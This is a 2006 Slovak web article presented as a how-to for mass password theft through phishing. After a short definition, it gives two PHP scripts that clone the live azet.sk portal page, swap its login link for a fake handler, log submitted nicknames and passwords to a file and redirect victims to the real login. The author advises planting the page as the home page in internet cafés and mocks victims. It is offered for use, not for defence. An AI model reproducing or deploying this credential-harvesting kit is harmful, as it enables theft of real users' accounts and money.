Zpět na seznam článků     Číst komentáře (4)     Verze pro tisk

Phishing - rýchly a hromadný spôsob získavania hesiel

Autor: timbulko   
8.1.2006

Phishing je základnou metódou sociálneho inžinierstva, ktorý využíva nepoznalosť ľudí. V tomto článku nám pomôže k získaniu veľkého množstva hesiel za krátky čas.


Slovo phishing vzniklo kombináciou slov fishing (rybárčenie) a phreaking (označuje osoby zneužívajúce telefónne linky). Phishing spočíva v krádeži (resp. získaní) citlivých informácií, napr. údajov o platobnej karte alebo mená a heslá k nejakej službe. K nalákaniu sú zneužívané metódy sociálneho inžinierstva.

Typickým súčasným phishingom je podvodný email, ktorý vyzerá ako by bol odoslaný z banky užívateľa. V takomto emaily banka pod nejakou zámienkou (hroziaca zrušením účtu apod.) žiada o overenie totožnosti a ďalších údajov (napr. číslo kreditnej karty, prístupové údaje). Po kliknutí na odkaz v emaily je užívateľovi zobrazená falošná webová stránka, kde vyplní požadované údaje. Následne užívateľ príde o svoje peniaze prevedené z jeho účtu alebo odčerpané z jeho kreditnej karty.

V tomto článku ale nebudeme rozosielať žiadne falošné maily, ale nastavíme niekomu falošnú stránku nejakého portálu (centrum, zoznam, azet) ako domovskú, on vyplní údaje, ktoré sa nám uložia a aby to nebolo nápadne, presmerujeme ho do jeho skutočnej schránky. Lenže ako vytvoriť vernú kópiu stránky, ktorej obsah sa neustále mení (na portáloch bývaju väčinou aj aktuálne správy, reklamy, a rôzne blbosti, ktoré sa každý deň menia).

Ako na to?


Takže po prvé si musíme založiť web na niektorom z freehostingov (musia mať podporu php skriptov). Ďalej by sme mali dobre ovládať HTML a PHP. Pre názornú ukážku si vyberiem portál azet.sk. Ako ale presnú kópiu stránky s jej aktuálnym obsahom? Musíme si celú stránku načítať a zameniť login azetu za náš falošný login:

--- index.php ---
<?
$open=FOpen("http://azet.sk/","r"); // otvoríme súbor na čítanie
$read=FRead($open,filesize("http://azet.sk/")); // prečítame ju a uložíme do premennej read
FClose($open); // zatvoríme súbor
$nahradene=str_replace("http://moje.azet.sk/prihlasenie.phtml?KDE=www.azet.sk%2Findex.phtml%3","login.php",$read); // Nahradíme login súbor azetu za náš za náš súbor
echo $nahradene; // a teraz to celé zobrazíme
?>


--- login.php ---
<?
$open=FOpen("hesla.dat","a"); // otvoríme súbor pre zápis na koniec
FWrite($_POST['nick']." > ".$_POST['heslo']."\n"); // zapíšeme údaje
FClose($open); // zatvoríme súbor
header("location: http://moje.azet.sk/prihlasenie.phtml?KDE=www.azet.sk%2Findex.phtml%3&nick=".$_POST['nick']."&heslo=".$_POST['heslo']); // presmerujeme na skutočný login azetu
?>

Teraz už len stačí nastaviť túto falošnú stránku do niekoľkých internetových kaviarní ako domácu a na výsledok nebude treba dlho čakať. Väčšina ľudí je takí "blbý", že si ani neskontrolujú správnosť adresy a zadajú svoj login a heslo. Ak k phishingu pridáme ešte bar spoofing, je pre bežného používateľa takmer neodhalitelný.


.::timbulko::.

Líbil se Vám článek?
Budeme potěšeni, pokud vás zaujme také reklamní nabídka

Social Bookmarking

     





Hodnocení/Hlasovalo: 3.67/3

1  2  3  4  5    
(známkování jako ve škole)